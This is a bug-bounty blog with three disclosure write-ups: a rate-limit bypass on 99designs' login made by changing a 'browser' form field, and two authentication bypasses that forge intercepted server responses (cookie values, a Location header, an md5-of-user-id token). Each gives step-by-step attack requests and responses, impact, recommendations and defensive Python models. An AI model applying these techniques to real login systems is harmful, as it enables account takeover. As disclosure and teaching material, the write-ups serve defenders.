Monday, May 19, 2014

A Way to Bypass Rate Limiting

Another Way to Bypass Rate Limiting

I want to share one of my findings on account.99designs.com, which I reported to them on 5th May 2014.

I found that the following site.com URL, https://account.99designs.com/sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA=, was vulnerable to brute-force attacks even though rate limiting was implemented for all site.com user accounts and the server was blocking the requests.

So first I tried status code (response code) and response length analysis, but once we hit 60 wrong password attempts the status was 200 for all right and wrong password attempts, and the error message was generic for both right and wrong passwords.

Then I tried a User-Agent based brute-force attack, changing the User-Agent header of each request to a known or an anonymous user agent, but that also failed. After further analysis I found that a parameter named browser was sent via POST in each request, with a wrong or right password, and that it contained the name of the browser currently in use, i.e. internet+explorer. So the server was checking not only the User-Agent header but also the browser parameter and its value internet+explorer.

So, to find a weakness in the rate-limiting countermeasure, I first sent more than 60 wrong password requests with the browser parameter set to internet+explorer. Once 60 wrong password requests had been sent, rate limiting was enabled and the server started blocking right and wrong password requests alike, returning status 200 and the same response length for all attempts, with a generic error message for both right and wrong passwords, so this failed again.

After that I started sending each request with the browser parameter changed to any known or unknown value as the browser name. I observed that after more than 60 wrong password attempts, and even after more than 10000 wrong password attempts, rate limiting was not enabled, nor did the status code or response length collapse to 200 for all attempts. Instead the right password returned 302 and a wrong password returned 200.

So, in this way I was able to bypass the site.com rate limiting by changing the browser parameter value in each request and analyzing the differences in status code and response length.

Original Request:

POST /sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&target=http://99designs.com/&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: __iswl_account99designscom=0; sp_id..cf43=f48faee182ec56ef.1399262073.1.1399262078.1399262073; sp_ses..cf43=*; _msuuid_75mlvfed70=937C0A8D-BDBA-40E7-9632-AA2BB97F051F; __ssid=69a7009e-a365-4481-87e3-60620271c47d; CookiedSession=P90fAidSF8hdgPCKZkgn2KdK7sAj0imf4TLPMLiyKU=.K-FAwEBC3Nlc3Npb25EYXRhAf-GAAECAQJJZAEMAAEFU3RvcmUB_4gAAAAh_4cEAQERbWFwW3N0cmluZ11zdHJpbmcB_4gAAQwBDAAAKv-GARZhWW1qc2tlbHo5SVM3UWozamtGeE9IAQEGbG9jYWxlBWVuLXVzAA==
Host: account.99designs.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

username=victimemailid@gmail.com&password=shssjssjs&browser=Internet+Explorer&browserversion=10.0&screenresolution=1422x889&operatingsystem=Windows&timezoneoffset=420&csrf_token=aYmjskelz9IS7Qj3jkFxOH


Modified Request:

POST /sso/1.0.0/login?site=contests&locale=en-us&return=https://99designs.com/sso/login&target=http://99designs.com/&rd=lNFC-iNCgY5Xnzsq6UvI_ykRl__KUS2MzzhB_Alu5LA= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: __iswl_account99designscom=0; sp_id..cf43=f48faee182ec56ef.1399262073.1.1399262078.1399262073; sp_ses..cf43=*; _msuuid_75mlvfed70=937C0A8D-BDBA-40E7-9632-AA2BB97F051F; __ssid=69a7009e-a365-4481-87e3-60620271c47d; CookiedSession=P90fAidSF8hdgPCKZkgn2KdK7sAj0imf4TLPMLiyKU=.K-FAwEBC3Nlc3Npb25EYXRhAf-GAAECAQJJZAEMAAEFU3RvcmUB_4gAAAAh_4cEAQERbWFwW3N0cmluZ11zdHJpbmcB_4gAAQwBDAAAKv-GARZhWW1qc2tlbHo5SVM3UWozamtGeE9IAQEGbG9jYWxlBWVuLXVzAA==
Host: account.99designs.com
Content-Length: 202
Connection: Keep-Alive
Cache-Control: no-cache
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

username=victimemailid@gmail.com&password=shssjssjs&browser=test+test&browserversion=10.0&screenresolution=1422x889&operatingsystem=Windows&timezoneoffset=420&csrf_token=aYmjskelz9IS7Qj3jkFxOH

In this way the attacker was able to bypass the rate limiting of 99designs.


Impact:

The attacker can successfully brute-force the password of any user's account even when rate limiting is enabled, and this can lead to account compromise.



Recommendation:
The response length for right and wrong passwords shall always be the same for any user's account.

Instead of User-Agent based validation for enabling rate limiting, the user id shall be checked for the number of wrong password attempts.


The account shall only be unlocked using an email which contains an unlock-account link.

The vulnerability was mitigated by 99designs Security Team.

So in this way one can bypass rate limiting and compromise the victim's account; this technique can also be used to find the same type of vulnerability on different websites.

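As an added example (not from the original post), here is a small Python model of the two rate-limiting designs the post contrasts: one keyed on client-supplied values (User-Agent plus the browser field), which a changed browser value resets, and one keyed on the account being logged into, as the recommendation above suggests. The request shape, credentials and lockout window are constructed for the demo.

```python
import hmac
import time
from collections import defaultdict

MAX_FAILURES = 60   # the post reports the lockout kicking in after 60 wrong passwords
WINDOW = 900        # lockout window in seconds (assumed for the demo)
GENERIC = (200, "Invalid username or password.")

# Constructed demo credential store; a real one holds salted password hashes.
PASSWORDS = {"victimemailid@gmail.com": "correct-horse"}

class RateLimiter:
    """Counts failed logins per key; key_fn decides what counts as one 'client'."""
    def __init__(self, key_fn):
        self.key_fn = key_fn
        self.failures = defaultdict(list)

    def blocked(self, req, now):
        key = self.key_fn(req)
        self.failures[key] = [t for t in self.failures[key] if now - t < WINDOW]
        return len(self.failures[key]) >= MAX_FAILURES

    def record_failure(self, req, now):
        self.failures[self.key_fn(req)].append(now)

def weak_key(req):
    # Keyed on values the client controls (User-Agent and the browser field):
    # every new browser value starts a fresh counter.
    return (req["headers"].get("User-Agent", ""), req["form"].get("browser", ""))

def account_key(req):
    # Keyed on the account being logged into, as the recommendation suggests.
    return req["form"].get("username", "").strip().lower()

def handle_login(req, limiter, now):
    """Returns (status, body). The lockout is checked before the password, so a
    locked account answers identically whether the guess is right or wrong."""
    if limiter.blocked(req, now):
        return GENERIC
    user = account_key(req)
    if hmac.compare_digest(PASSWORDS.get(user, ""), req["form"].get("password", "")):
        return 302, "Location: /dashboard"
    limiter.record_failure(req, now)
    return GENERIC

def make_req(browser, password):
    # Constructed request shaped like the POST body shown in the post.
    return {"headers": {"User-Agent": "Mozilla/5.0 (compatible; MSIE 10.0)"},
            "form": {"username": "victimemailid@gmail.com",
                     "password": password, "browser": browser}}

def simulate(key_fn):
    """60 wrong guesses with browser=Internet Explorer, then the right password with
    browser changed to 'test test'. Returns the status of that last attempt."""
    limiter = RateLimiter(key_fn)
    now = time.time()
    for i in range(MAX_FAILURES):
        handle_login(make_req("Internet Explorer", "wrong-%d" % i), limiter, now)
    return handle_login(make_req("test test", "correct-horse"), limiter, now)[0]

if __name__ == "__main__":
    print("client-keyed limiter:", simulate(weak_key))      # 302: bypassed
    print("account-keyed limiter:", simulate(account_key))  # 200: still locked
```

Keying on the account means a third party can lock a victim out, which is why the post pairs it with an email unlock link; production systems usually key on source address as well.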
Suggestions and feedback are welcome.

Wednesday, May 7, 2014

Authentication Bypass & Privilege Escalation Using Header Manipulation & Cookie Injection

A Way to Bypass Authentication & Gain Admin Privilege Using Login Validation Process Prediction

While researching and working on bug bounties in Feb 2013, I found a way to bypass authentication and gain admin privilege using header manipulation and cookie injection; using this vulnerability we can take over all the user accounts of a website if that site is vulnerable to this type of attack.

Using this vulnerability the attacker can predict the login validation process for any admin's account by combining various techniques, and in this way he can also bypass authentication for all passwords of all the admin accounts and successfully compromise the admin accounts, as the login validation process is predictable by the attacker.

I tried various techniques to bypass the login, like arbitrary method usage, cookie manipulation, status code value modification and response code modification, but all of these failed, so the challenge was to understand the login validation process and find a weakness in it. So now I will describe how I was able to bypass the admin authentication.


Please note: there was a precondition that the attacker only needs to know the admin's login email id. This can be obtained using the forgot-password function or even the login URL itself.


Steps to Execute the Attack:
For the login validation process analysis I created 2 test accounts.

1. First we send the login request using our own account attackerloginid@testsite.com with a wrong password, while intercepting the response for the wrong password, using the login link mentioned below.

https://testsite.com/user/login

2. From this I found that if the password is wrong, the server response code is 302 Found, the first Set-Cookie, named remember_email, has a null value, the second Set-Cookie, named registration_status, has the value unregistereduser, and the Location header value is the site login page URL https://testsite.com/user/login.

3. Now we send the login request using our own account attackerloginid@testsite.com with a right password, while intercepting the response for the right password, using the login link mentioned below.

https://testsite.com/user/login

4. From this I found that if the password is right, the server response code is 302 Found, the first Set-Cookie, named remember_email, has the value attackerloginid@testsite.com, the second Set-Cookie, named registration_status, has the value registereduser, and the Location header value is the site dashboard page URL https://testsite.com/user/accounts/dashboard.

5. Now that we can see the variation between the server responses for wrong and right passwords, we know we can predict the login validation process for the right password for any victim's account and also for the admin account.

In simple words, the attacker now tries to log into the victim's account using the login URL and the victim's user id or login email id, victimloginid@testsite.com, with a wrong password, while intercepting the response using any web proxy. He gets the server response code 302 Found, with a first Set-Cookie named remember_email with a null value, a second Set-Cookie named registration_status with the value unregistereduser, and the Location header value set to the site login page URL https://testsite.com/user/login.

The attacker now adds the first Set-Cookie, remember_email, with the value victimloginid@testsite.com, and the second Set-Cookie, registration_status, with the value registereduser, sets the Location header value to the site user dashboard page URL https://testsite.com/user/accounts/dashboard, and forwards the request using any web proxy; the attacker is now successfully logged into the victim's account.

To bypass the admin's login authentication in the same way, the attacker adds the first Set-Cookie, remember_email, with the value adminloginid@testsite.com, and the second Set-Cookie, registration_status, with the value registeredadmin, sets the Location header value to the site admin dashboard page URL https://testsite.com/admin/accounts/dashboard, and forwards the request using any web proxy; the attacker is now successfully logged into the admin's account and gains admin privilege.

So in this way we can easily bypass the admin authentication as well as user authentication :).

Key points: the registration_status cookie value unregistereduser is for a user with a wrong password, registereduser is for a user with a right password, and registeredadmin is for the admin user with a right password.

Attacker's Login ID: attackerloginid@testsite.com


Victim's Login ID: victimloginid@testsite.com


Admin's Login ID: adminloginid@testsite.com

Original Server Response Using Attacker's Account with Wrong Password:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Tue, 15 Feb 2013 18:30:09 GMT
Location: https://testsite.com/user/login
Set-Cookie: remember_email=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: registration_status=unregistereduser; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT
Status: 302 Found
Vary: Accept-Encoding
X-Runtime: 95
Content-Length: 109
Connection: keep-alive

Original Response Using Attacker's Account with Right Password:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Tue, 15 Feb 2013 18:32:22 GMT
Location: https://testsite.com/user/accounts/dashboard
Set-Cookie: remember_email=attackerloginid@testsite.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: registration_status=registereduser; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT
Status: 302 Found
Vary: Accept-Encoding
X-Runtime: 95
Content-Length: 109
Connection: keep-alive


Modified response in which the attacker modified the Set-Cookie headers and their values, the Status, and the Location header and its value, and sent it as a request to bypass the victim's login:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Tue, 15 Feb 2013 18:35:43 GMT
Location: https://testsite.com/user/accounts/dashboard
Set-Cookie: remember_email=victimloginid@testsite.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: registration_status=registereduser; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT
Status: 302 Found
Vary: Accept-Encoding
X-Runtime: 95
Content-Length: 109
Connection: keep-alive


Modified response in which the attacker modified the Set-Cookie headers and their values, the Status, and the Location header and its value, and sent it as a request to bypass the admin's login:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Tue, 15 Feb 2013 18:40:14 GMT
Location: https://testsite.com/admin/accounts/dashboard
Set-Cookie: remember_email=adminloginid@testsite.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: registration_status=registeredadmin; path=/; expires=Fri, 10-Dec-2016 18:32:44 GMT
Status: 302 Found
Vary: Accept-Encoding
X-Runtime: 95
Content-Length: 109
Connection: keep-alive

Impact: 
The login validation process is predictable, using which an attacker can easily compromise the admin's account and any other user's account of the application.


Recommendation:  
The login validation shall not depend on the combination of cookie values and Location header values, and privileges shall not be granted on the basis of cookie values. Also it shall not depend on client-side validation; instead proper server-side validation of the correct password shall be done.

So in this way one can take over or bypass the authentication of the admin's account as well as any victim user's account using admin login validation process prediction; this approach can also be used to find the same type of vulnerability on many different websites.

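An added example, not the site's code: a Python model of the authorization pattern described above (identity and privilege read straight from the remember_email and registration_status cookies) beside a hardened version that issues a random session id only after a server-side password check and keeps the role in a server-side store, as the recommendation suggests. The passwords, the session_id cookie name and the store layout are constructed for the demo.

```python
import hmac
import secrets

# Constructed demo data; a real deployment stores salted password hashes.
PASSWORDS = {"attackerloginid@testsite.com": "attacker-pass",
             "victimloginid@testsite.com": "victim-pass",
             "adminloginid@testsite.com": "admin-pass"}
ROLES = {"attackerloginid@testsite.com": "user",
         "victimloginid@testsite.com": "user",
         "adminloginid@testsite.com": "admin"}
SESSIONS = {}   # server-side store: opaque session id -> {"email", "role"}

def parse_cookies(header):
    """Splits a Cookie request header into a dict (first value wins)."""
    out = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            out.setdefault(name, value)
    return out

def weak_authorize(cookie_header):
    """The pattern from the post: identity and privilege come from remember_email
    and registration_status, both of which the client can set to anything."""
    c = parse_cookies(cookie_header)
    status = c.get("registration_status", "unregistereduser")
    if status == "registeredadmin":
        return ("admin", c.get("remember_email"))
    if status == "registereduser":
        return ("user", c.get("remember_email"))
    return None

def login(email, password):
    """Checks the password on the server and only then issues a random session id.
    The role is stored next to it on the server, never inside a cookie value."""
    if not hmac.compare_digest(PASSWORDS.get(email, ""), password):
        return None
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"email": email, "role": ROLES[email]}
    return sid

def hardened_authorize(cookie_header):
    """Only a session id the server issued maps to an identity; a forged cookie
    carries no id that exists in the store, so it is rejected."""
    rec = SESSIONS.get(parse_cookies(cookie_header).get("session_id", ""))
    return (rec["role"], rec["email"]) if rec else None

if __name__ == "__main__":
    forged = "remember_email=adminloginid@testsite.com; registration_status=registeredadmin"
    print("weak:", weak_authorize(forged))          # ('admin', 'adminloginid@testsite.com')
    print("hardened:", hardened_authorize(forged))  # None
```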

Suggestions and feedback are welcome.

Tuesday, May 6, 2014

A Way to Bypass Authentication

Authentication Bypass Using Login Validation Process Prediction


While researching and working on bug bounties in late Dec 2012, I found a way to bypass authentication using which we can take over all the user accounts of a website if that site is vulnerable to this type of attack.

Using this vulnerability the attacker can predict the login validation process for any victim's account by combining various techniques, and in this way he can also bypass authentication for all passwords of all accounts and successfully compromise the victims' accounts, as the login validation process is predictable by the attacker.

I tried various techniques to bypass the login, like response code modification and arbitrary method usage, but all of these failed, so the challenge was to understand the login validation process and find a weakness in it. So now I will describe how I was able to bypass the authentication.


Please note: there was a precondition that the attacker only needs to know the victim's login id or user id.


Steps to Execute the Attack:
For the login validation process analysis I created 2 test accounts.

1. First we send the login request using our own account attackerloginid with a wrong password, while intercepting the response for the wrong password, using the login link mentioned below.

https://testsite.com/login.jsp

2. From this I found that if the password is wrong, the server response code is 200 OK, the Set-Cookie named pstoken has a null value and is sent once, and the JSON status value in the body is {"failed":false}.

3. Now we send the login request using our own account attackerloginid with a right password, while intercepting the response for the right password, using the login link mentioned below.

https://testsite.com/login.jsp

4. From this I found that if the password is right, the server response code is 302 Found, the Set-Cookie named pstoken has the md5 hash of the attacker's user id or login id, 636559678682db9e21c958a4df44eea4, and is sent twice, and the JSON status value in the body is {"success":true}.

5. Now that we can see the variation between the server responses for wrong and right passwords, we know we can predict the login validation process for the right password.

In simple words, the attacker now tries to log into the victim's account using the login URL and the victim's user id or login id, victimloginid, with a wrong password, while intercepting the response using any web proxy. He gets the server response code 200 OK, with a Set-Cookie named pstoken with a null value, sent once, and the JSON status value {"failed":false}.

The attacker now modifies the response code 200 OK to 302 Found, adds the Set-Cookie named pstoken twice, changing its value from null to the md5 hash of the victim's user id or login id, e9fc2abd9060fde1a67e3367b7d64bd0, then modifies the JSON status value from {"failed":false} to {"success":true} and forwards the request using any web proxy; the attacker is now successfully logged into the victim's account.

So in this way we can easily bypass the authentication :).


Attacker's login ID: attackerloginid, md5 hash value: 636559678682db9e21c958a4df44eea4

Victim's login ID: victimloginid, md5 hash value: e9fc2abd9060fde1a67e3367b7d64bd0

Original Server Response Using Attacker's Account with Wrong Password:

HTTP/1.1 200 OK
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"failed":false}


Original Response Using Attacker's Account with Right Password:

HTTP/1.1 302 Found
Date: Wed,  7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":true}

Modified response in which the attacker modified the response code, the Set-Cookie headers and their values and the JSON status value, and sent it as a request:

HTTP/1.1 302 Found
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":true}


Impact: 
The login validation process is predictable, using which an attacker can easily compromise any user's account of the application.


Recommendation:  
The login validation shall not depend on the combination of response code values, cookie values, JSON-based status values and the like. Also it shall not depend on client-side validation; instead proper server-side validation of the correct password shall be done.

So in this way one can take over or bypass the authentication of any victim's account using login validation process prediction; this approach can also be used to find the same type of vulnerability on many different websites.

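An added example, not the site's code: in Python, the pstoken scheme described above (md5 of the login id, which anyone who knows the id can compute) beside an HMAC-signed token that binds the login id and an expiry under a server-side key, so the client cannot construct it and the server validates it without trusting the cookie value. SERVER_KEY, TOKEN_TTL and the token layout are assumptions for the demo.

```python
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)  # assumed: generated at startup, kept server-side
TOKEN_TTL = 3600                      # assumed token lifetime in seconds

def weak_issue(login_id):
    """The scheme the post describes: pstoken is md5 of the login id, so anyone
    who knows a login id can compute that account's token."""
    return hashlib.md5(login_id.encode()).hexdigest()

def weak_validate(token, login_id):
    # Any client that knows login_id passes this check without a password.
    return token == weak_issue(login_id)

def _mac(login_id, exp):
    return hmac.new(SERVER_KEY, f"{login_id}|{exp}".encode(), hashlib.sha256).hexdigest()

def hardened_issue(login_id, now=None):
    """Called only after a server-side password check. Token layout (assumed):
    login_id.expiry.HMAC-SHA256(SERVER_KEY, login_id|expiry)."""
    now = time.time() if now is None else now
    exp = int(now) + TOKEN_TTL
    return f"{login_id}.{exp}.{_mac(login_id, exp)}"

def hardened_validate(token, now=None):
    """Returns the login id if the MAC verifies and the token is unexpired, else None.
    The identity comes from a value only the server could have produced."""
    now = time.time() if now is None else now
    try:
        login_id, exp_s, mac = token.rsplit(".", 2)   # rsplit: login ids may contain dots
        exp = int(exp_s)
    except ValueError:
        return None
    if not hmac.compare_digest(mac, _mac(login_id, exp)):
        return None
    return login_id if int(now) < exp else None

def forged_token(login_id, now=None):
    """What a client that knows only the login id can build: the weak md5 value in
    place of the MAC. Used here to show that hardened_validate rejects it."""
    now = time.time() if now is None else now
    return f"{login_id}.{int(now) + TOKEN_TTL}.{weak_issue(login_id)}"

if __name__ == "__main__":
    print("weak accepts id-derived token:", weak_validate(weak_issue("victimloginid"), "victimloginid"))
    print("hardened accepts forged token:", hardened_validate(forged_token("victimloginid")))
    print("hardened accepts issued token:", hardened_validate(hardened_issue("victimloginid")))
```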

Suggestions and feedback are welcome.